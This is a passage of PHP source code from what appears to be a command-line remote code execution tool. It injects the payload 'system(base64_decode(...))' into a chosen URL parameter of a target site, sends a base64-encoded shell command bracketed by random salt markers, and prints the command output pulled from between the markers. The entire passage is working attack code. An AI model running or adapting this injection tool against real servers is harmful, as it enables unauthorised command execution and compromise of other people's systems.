    if (!is_bool(stripos($argv[1], '?'))) {
        $url = $argv[1] . "&{$argv[2]}=" . urlencode("system(base64_decode(\$_GET[365234]));") . "&365234=" . urlencode(base64_encode("echo {$salt};{$command};echo {$salt};"));
    } else {
        $url = $argv[1] . "?{$argv[2]}=" . urlencode("system(base64_decode(\$_GET[365234]));") . "&365234=" . urlencode(base64_encode("echo {$salt};{$command};echo {$salt};"));
    }
    $resp = file_get_contents($url);
    // Split the body on the marker; three or more pieces mean both markers were
    // present, and the piece between them is printed.
    $resp_arr = split($salt, $resp);
    if (count($resp_arr) >= 3) {
        echo $resp_arr[1] . "\n";
    } else {
        echo "错误:执行失败.\n";
    }
}
function get_salt($length = 8)
{
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $salt = '';
    for ($i = 0; $i < $length; $i++) {